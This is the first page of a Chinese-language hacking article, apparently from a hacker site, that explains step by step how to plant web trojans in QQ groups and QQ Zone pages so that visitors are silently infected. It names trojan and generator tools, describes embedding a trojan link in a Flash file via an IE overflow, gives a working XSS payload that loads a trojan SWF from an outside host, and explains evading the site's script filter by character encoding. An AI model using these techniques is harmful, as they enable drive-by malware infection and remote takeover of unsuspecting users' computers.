QQ木马到底怎么做 QQ挂马方法大揭密

• 　　有无数人每天都在使用QQ ，大家往往注重于QQ尾巴病毒、QQ传木马之类的攻击方式，却很少有人注意到我们经常访问的QQ群、QQ空间里面隐藏着更大的安全危险，远比QQ尾巴病毒、QQ传木马之类的隐蔽得多，危害更加大。今天我们就来看看攻击者是如何在QQ群和QQ空间中挂上网页木马，攻击浏览用户的!

  　　一、QQ群中简简单单挂木马

  　　在一个比较火的QQ群里挂上网页木马，一定很容易得到许多肉鸡的。怎么在QQ群里挂马，是在群里面群发木马的网址吗?现在已经不会有人上这样的当了。我们要作的只是在群里面发一个作了手脚的帖子。

  　　步骤一：制作网页木马

  　　在攻击前，我们首先要制作好一个木马网页。这里笔者使用了“上兴远程控制木马V2006”，这个木马功能非常强，以前笔者曾作过介绍。用上兴生成木马服务端程序“muma.exe”后，将服务端上传到某个网站上去，假设地址为“http://www.*****.com.cn/muma.exe”。

  　　打开“南域剑盟网页木马生成器”，在中间的“URL”处填入木马的链接地址，点击“生成”按钮，将会在生成器当前目录下生成一个名为“script.txt”的文件(如图1)。用记事本打开刚才生成的“script.txt”文件，可以看到木马代码，代码是经过加密的，一般人很难看出这是网页木马代码来(如图2)。复制所有代码，然后将代码插入到任意一个正常的网页中，就可以得到一个网页木马了。

  　　小提示:将木马代码插入正常的网页中，其位置一般是位于“”标记中间。

  

  图1 用木马生成器生成木马代码

  

  图2 加密的木马代码

  　　步骤二：制作SWF木马

  　　在以前的QQ群中，本来只需要发一张带图片的帖子就可以实现挂马的目的。不过现在QQ群也改版了，挂马就需要多一个步骤了，我们还需要将网页木马嵌入Flash文件中。

  　　打开“SWF插马工具(Icode To SWF)”，在“SWF文件”中浏览选择本机上的某个正常的Flash文件;在“插入代码”中填写刚才与在的网页木马的链接地址(如图3)。然后点击“给我插”按钮，即可将网页木马链接插入到正常的Flash文件中了。SWF插马工具生成的Flash文件是利用了一个IE漏洞，对方打开Flash文件后，就会造成IE溢出，自动访问木马网页在后台下载运行木马程序。

  

  图3 生成SWF木马

  　　步骤三：在QQ群中挂马

  　　首先将刚才生成的SWF木马文件上传到某个空间中，然后打开某个QQ群的BBS栏目，点击“发表新文章”。在新文章书写页面中点击“插入Flash”按钮，输入SWF木马文件的网络链接地址及长宽，然后点击后面的小钩按钮，插入Flash文件(如图4)。发表新文章后，当有人在QQ群中打开查看这篇文章时，就会自动播放Flash并在后台下载运行上兴木马服务端了。

  

  图4 在QQ群中发布Flash木马

  　　小提示：当然我们也可以直接在QQ群中散布SWF木马文件的网址，别人点击后一样会中木马，不过这种方式不如发布文章隐蔽和效果好，攻击的持续性也不强。

  　　二、QQ空间玩挂马

  　　自从腾讯推出QQ空间(QQ-zone)后，各种跨站漏洞便不断暴出。虽然腾讯已经对QQ-zone进行了一次全面的更新，禁止了运行自定义脚本，不过通过我们的测试，发现所做的限制是很简单的，只需要转换一下字符就可以突破限制，在QQ空间上任意挂马。

  　　方法一：挂Flash木马

  　　打开QQ空间后，在页面中点击“自定义”按钮，在弹出的工具条上依次单击“个性设置”→“新建模块”命令，也可在QQ空间页面中直接按下+组合键，打开自定义对话框。在弹出的网页对话框中输入任意“模块名称”，点击“提交”按钮，弹出创建成功的提示框。然后出现“添加内容”对话框，将其中的“网址”、“图片”中自带的“http://”删除，保持“链接名称”为空白。在“评论”中输入如下代码(如图5)：

  　　以下是引用片段：

  　　“＜img src="javascript:document.getElementById('Mlogo').innerHTML+='＜div style=\'position:absolute;top:0;left:0;\'>＜EMBED src=\'http://www.binghewu.com.cn/muma.swf\' quality=high wmode=\'transparent\' WIDTH=\'925\' HEIGHT=\'655\' TYPE=\'application/x-shockwave-flash\'＞＜/div＞';"＞ ”

  　　代码中的Flash地址“http://www.binghewu.com.cn/muma.swf”，是刚才制作上传的SWF木马链接地址，可以更改为其它任意Flash木马文件地址。提交代码后，用户进入此QQ空间时，会自动打开显示上传的SWF木马Flash，从而在后台下载运行上兴木马服务端程序。

  

  图5 通过自定义模块添加SWF木马

  　　小提示：QQ空间是通过检测用户提交的代码中，是否含用“javascript”之类的字符进行过滤的。在上面的代码中，将脚本部分代码用ASCII编码之后替换躲过了过滤，如“javascript”可以替换为“javascrip”，“p”为“p”的ASCII编码。具体ASCII编码转换可到“http://www.killadm.ful.cn/ascii.asp”查询(如图6)。

  

  图6 通过网页转换字符ASCII码

  　　方法二：挂网页木马

  　　上面的方法是直接在QQ空间中挂上一个Flash木马文件，实现的方法虽然比较简单，不过这个Flash文件有可能会让别人起疑心。既然我们可以在QQ空间中写入自定义代码，何不干脆直接挂上网页木马呢?

  　　用上面同样的方法新建一个模块，代码如下：

  　　以下是引用片段：
  

• [1] [2] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• QQ木马到底怎么做 QQ挂马方法大揭密 相关文章：
• ·网站排名中关于做SEO注意的几点
• ·如何让你的U盘做到100%预防电脑病毒
• ·网站排名中关于做SEO(搜索优化)注意的几点
• ·Photoshop将现成图案做成立体徽章
• ·适合做网站优化的blog程序推荐
• ·Windows Vista系统中如何做到安全刻录
• ·加密视频光盘轻松刻录教你做
• ·Photoshop蒙尘与划痕滤镜做照片美白
• ·如何做好图片网站的搜索优化
• ·使用httpModule做权限系统
• QQ木马到底怎么做 QQ挂马方法大揭密 相关软件
• ·做人做事好心态
• ·做人做事好方法
• ·商界成功者最推崇的成事法则：先做人后做事
• ·职场宝典：在中国做事
• ·做好每一个自己
• ·猪蹄的十三种家常做法
• ·没有女朋友？自己做一个！
• ·毛泽东兵法－为纪念毛泽东逝世30周年而做
• ·美食讲堂：《一学就会做炒饭》
• ·越做越爱:一个二奶的独白

上一篇:Excel 2007单元格应用或删除单元格底纹

下一篇:养成良好习惯 使用网上银行全攻略

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com